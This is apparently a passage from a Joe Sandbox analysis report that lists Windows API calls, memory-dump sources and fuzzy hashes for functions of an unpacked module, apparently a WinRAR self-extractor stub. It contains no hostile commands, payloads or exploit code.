• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: K1
• API String ID: 776569668-2791441000
• Opcode ID: 06bf0b60203833463a45d36eaebf938c7821bef1d3a275086842dbb88b3de912
• Instruction ID: bf70a08187bb7eefca498f7644f1c2834efcfa37b2cf9d5d3ff75d9729d8a35a
• Opcode Fuzzy Hash: 06bf0b60203833463a45d36eaebf938c7821bef1d3a275086842dbb88b3de912
• Instruction Fuzzy Hash: 8F119B75A15108FFCB06EF64C852DDE3B75EF04390B5151A5FA194F2A2DA31EF509B80
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0030EA62,00000000,00000000,00000000,00000000,00000000,00303FBF), ref: 0030E32F
• __fassign.LIBCMT ref: 0030E3AA
• __fassign.LIBCMT ref: 0030E3C5
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0030E3EB
• WriteFile.KERNEL32(?,00000000,00000000,b0,00000000,?,?,?,?,?,?,?,?,?,0030EA62,00000000), ref: 0030E40A
• WriteFile.KERNEL32(?,00000000,00000001,b0,00000000,?,?,?,?,?,?,?,?,?,0030EA62,00000000), ref: 0030E443
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID: S#~>$b0
• API String ID: 1324828854-53534177
• Opcode ID: a3ad37f5982d51785e15aeaf25d4213f5c669a455e8fef6d77d67c255069b7cc
• Instruction ID: 084e236729fc150f78f61b04285b09bb412962c4435c96252ec86cbd5ca5ea6e
• Opcode Fuzzy Hash: a3ad37f5982d51785e15aeaf25d4213f5c669a455e8fef6d77d67c255069b7cc
• Instruction Fuzzy Hash: 2851E4B4F01209AFCB12CFA9D891AEEBBF9EF09300F14455AE951E72D1D7309940CB60
APIs
• GetWindow.USER32(?,00000005), ref: 002FC364
• GetClassNameW.USER32(00000000,?,00000800), ref: 002FC393
  • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
• GetWindowLongW.USER32(00000000,000000F0), ref: 002FC3B1
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 002FC3C8
• GetObjectW.GDI32(00000000,00000018,?), ref: 002FC3DB
  • Part of subcall function 002F958C: GetDC.USER32(00000000), ref: 002F9598
  • Part of subcall function 002F958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 002F95A7
  • Part of subcall function 002F958C: ReleaseDC.USER32(00000000,00000000), ref: 002F95B5
  • Part of subcall function 002F9549: GetDC.USER32(00000000), ref: 002F9555
  • Part of subcall function 002F9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 002F9564
  • Part of subcall function 002F9549: ReleaseDC.USER32(00000000,00000000), ref: 002F9572
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 002FC402
• DeleteObject.GDI32(00000000), ref: 002FC409
• GetWindow.USER32(00000000,00000002), ref: 002FC412
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
• String ID: STATIC
• API String ID: 1444658586-1882779555
• Opcode ID: a7e1a97da8aa6d5932e9a33f5df04c271f75f834bb75ff6684d9f2c6328a40f6
• Instruction ID: cc66dab12baa1f269413f901cfa15b7bcdabd58273e4cedf417367182700e27d
• Opcode Fuzzy Hash: a7e1a97da8aa6d5932e9a33f5df04c271f75f834bb75ff6684d9f2c6328a40f6
• Instruction Fuzzy Hash: 7721967255022D7BE7226B648C46FFEB65CAF0A791F108031FB05B6191DB745A528AA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                              • API String ID: 0-2277559157
                                                                                                                                              • Opcode ID: d470c8e7b240a750050b17aa0862b6ff3be8d3408404d63c31dacf9783a24faf
                                                                                                                                              • Instruction ID: dba9a566e232826621c538ca98f7ebda1ba8f209098d40ce9599c1a5dddadfd8
                                                                                                                                              • Opcode Fuzzy Hash: d470c8e7b240a750050b17aa0862b6ff3be8d3408404d63c31dacf9783a24faf
                                                                                                                                              • Instruction Fuzzy Hash: 73F169316A43C1CBDF14DF668881BFE779D6F90300F884579ED468B287CA60986DCB62
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002FA431
                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 002FA45E
                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 002FA473
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 002FA484
                                                                                                                                              • GetDlgItem.USER32(?,00000065), ref: 002FA48D
                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 002FA4A1
                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002FA4B3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                              • String ID: LICENSEDLG
                                                                                                                                              • API String ID: 3214253823-2177901306
                                                                                                                                              • Opcode ID: b32a0631bb24f2b302b59ee0d4ce00c802305b671b856f896d18bdab96207e8b
                                                                                                                                              • Instruction ID: 3486e159cd5dc6cda910b8b6c4002ffcc9604094c94cc38e194562919d6f88ab
                                                                                                                                              • Opcode Fuzzy Hash: b32a0631bb24f2b302b59ee0d4ce00c802305b671b856f896d18bdab96207e8b
                                                                                                                                              • Instruction Fuzzy Hash: 0621B7722542197BD2125F25ED8DF7BBB6CEB4B7C4F018024F705E61A0C7E69D229632
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E926D
                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002E9290
                                                                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002E92AF
                                                                                                                                                • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
                                                                                                                                              • _swprintf.LIBCMT ref: 002E934B
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 002E93C0
                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 002E93FC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                                                              • String ID: rtmp%d
                                                                                                                                              • API String ID: 2111052971-3303766350
                                                                                                                                              • Opcode ID: feb4b74e59879d13338c71d9dc25a6b285a232c0005d555a0afed91c8e454a26
                                                                                                                                              • Instruction ID: 622bca2cbc5d629fe5e8c3a8822bfb5c5d1324a5e777bd26787f69716d3c53da
                                                                                                                                              • Opcode Fuzzy Hash: feb4b74e59879d13338c71d9dc25a6b285a232c0005d555a0afed91c8e454a26
                                                                                                                                              • Instruction Fuzzy Hash: 6541A375861199A6DF21EFA2CD44EEE737CAF44381F8444A6B608E3042DA349BA5CF60
                                                                                                                                              APIs
                                                                                                                                              • __aulldiv.LIBCMT ref: 002F06F3
                                                                                                                                                • Part of subcall function 002EA995: GetVersionExW.KERNEL32(?), ref: 002EA9BA
                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 002F071C
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 002F072E
                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002F073B
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F0751
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F075D
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 002F0793
                                                                                                                                              • __aullrem.LIBCMT ref: 002F081D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1247370737-0
                                                                                                                                              • Opcode ID: 840c6e4b2c97a5efa1726079998c5e7c9c8332a2490bc39562142e7ba26f79a2
                                                                                                                                              • Instruction ID: 114695b6f800525c7332ad554e8a43804b375c3f0f7a1357138e0ef05e817774
                                                                                                                                              • Opcode Fuzzy Hash: 840c6e4b2c97a5efa1726079998c5e7c9c8332a2490bc39562142e7ba26f79a2
                                                                                                                                              • Instruction Fuzzy Hash: A14139B6408309AFC710DF65C8809ABF7E9FF88744F004A2EF69692251E735E558CB52
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 269201875-2989149754
                                                                                                                                              • Opcode ID: 2c2e827226395de318401dfcb54407c1bc00da6d5c11a62ab3930fca38bf6729
                                                                                                                                              • Instruction ID: 3e471f65c848b6df35a5cc12fb8870ee266b58d4b7f11018e40dd4c05267ce68
                                                                                                                                              • Opcode Fuzzy Hash: 2c2e827226395de318401dfcb54407c1bc00da6d5c11a62ab3930fca38bf6729
                                                                                                                                              • Instruction Fuzzy Hash: 7041CF36E013049FDB11DF78C891A6EB7A6EF89714F1685A8E515EB391D731AD01CB80
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002F87A0), ref: 002F8994
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002F89B5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocByteCharGlobalMultiWide
                                                                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                              • API String ID: 3286310052-4209811716
                                                                                                                                              • Opcode ID: 3a24be2ee196f785cdfa2f89b1eb2ae9014b8865acd2594dab05812007bbb992
                                                                                                                                              • Instruction ID: e969f28f9b859fc5c18b1d1c6c9c1e4e79d22bb70daf4709f5412ad8225355c4
                                                                                                                                              • Opcode Fuzzy Hash: 3a24be2ee196f785cdfa2f89b1eb2ae9014b8865acd2594dab05812007bbb992
                                                                                                                                              • Instruction Fuzzy Hash: CA31253211530A7ED316AF609C06FBFF79CDF46360F10452AF6109A2C1EFB5992587A6
APIs
• ShowWindow.USER32(?,00000000), ref: 002F8FFF
• GetWindowRect.USER32(?,00000000), ref: 002F9044
• ShowWindow.USER32(?,00000005,00000000), ref: 002F90DB
• SetWindowTextW.USER32(?,00000000), ref: 002F90E3
• ShowWindow.USER32(00000000,00000005), ref: 002F90F9
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
APIs
  • Part of subcall function 0030B4CA: _free.LIBCMT ref: 0030B4F3
• _free.LIBCMT ref: 0030B554
  • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
  • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
• _free.LIBCMT ref: 0030B55F
• _free.LIBCMT ref: 0030B56A
• _free.LIBCMT ref: 0030B5BE
• _free.LIBCMT ref: 0030B5C9
• _free.LIBCMT ref: 0030B5D4
• _free.LIBCMT ref: 0030B5DF
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetLastError.KERNEL32(?,?,0030168B,002FF0E2), ref: 003016A2
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003016B0
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003016C9
• SetLastError.KERNEL32(00000000,?,0030168B,002FF0E2), ref: 0030171B
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID:
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 0-1718035505
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00306B29,?,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002), ref: 00306B98
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00306BAB
• FreeLibrary.KERNEL32(00000000,?,?,?,00306B29,?,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002,00000000), ref: 00306BCE
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$S#~>$mscoree.dll
• API String ID: 4061214504-1754222316
APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 002F096E
  • Part of subcall function 002EA995: GetVersionExW.KERNEL32(?), ref: 002EA9BA
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002F0990
• FileTimeToSystemTime.KERNEL32(?,?), ref: 002F09AA
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002F09BB
• SystemTimeToFileTime.KERNEL32(?,?), ref: 002F09CB
• SystemTimeToFileTime.KERNEL32(?,?), ref: 002F09D7
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
APIs
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2931989736-0
                                                                                                                                              • Opcode ID: 0fb454f4e869ab262fb41b9304c20d87bb38e605e90df5ee7261ac9e7a5f065f
                                                                                                                                              • Instruction ID: e2e1919a397453ceb711249fed2e62a13db81fcfe6444782582b54d4212cca1b
                                                                                                                                              • Opcode Fuzzy Hash: 0fb454f4e869ab262fb41b9304c20d87bb38e605e90df5ee7261ac9e7a5f065f
                                                                                                                                              • Instruction Fuzzy Hash: BB21C47162020EABDB1C9E11DD81EBBF7AC9F547C8F14417AFE049A101E770EDA587A0
APIs
• GetLastError.KERNEL32(?,003200E0,00303394,003200E0,?,?,00302E0F,?,?,003200E0), ref: 0030851A
• _free.LIBCMT ref: 0030854D
• _free.LIBCMT ref: 00308575
• SetLastError.KERNEL32(00000000,?,003200E0), ref: 00308582
• SetLastError.KERNEL32(00000000,?,003200E0), ref: 0030858E
• _abort.LIBCMT ref: 00308594
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 7efda27d115293fe943d6d9058700ea02cdb2d11b9e873d0edf4370082c102b8
• Instruction ID: 4a7e3b1ba3ad8218631ba06fa6d72d4a8f9a212003869783ea38b27ca8e279e4
• Opcode Fuzzy Hash: 7efda27d115293fe943d6d9058700ea02cdb2d11b9e873d0edf4370082c102b8
• Instruction Fuzzy Hash: 32F0283564760067C30333347C2AF6F226D8BD67B1F264625F559AB2D1EE308E028124
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,003034E6,00000000,00000000,0030451B,?,0030451B,?,00000001,003034E6,?,00000001,0030451B,0030451B), ref: 0030B637
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0030B6C0
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0030B6D2
• __freea.LIBCMT ref: 0030B6DB
  • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID: S#~>
• API String ID: 2652629310-2989149754
• Opcode ID: cc0902b6353d8d1d7d4beb15b4a38d9b1e815ba3f6f4d8f4e035d47683e31808
• Instruction ID: 0334a0b21a68213d92f635fa993a52446b6c41c0c1db26308316e02aa561a092
• Opcode Fuzzy Hash: cc0902b6353d8d1d7d4beb15b4a38d9b1e815ba3f6f4d8f4e035d47683e31808
• Instruction Fuzzy Hash: 7B31B072A0120EABDF268F64CC65DAFBBA9EB44750F054128FC14DB190E736DD60CBA0
APIs
  • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
  • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
• EndDialog.USER32(?,00000001), ref: 002FC2F2
• GetDlgItemTextW.USER32(?,00000068,00000800), ref: 002FC308
• SetDlgItemTextW.USER32(?,00000066,?), ref: 002FC322
• SetDlgItemTextW.USER32(?,00000068), ref: 002FC32D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
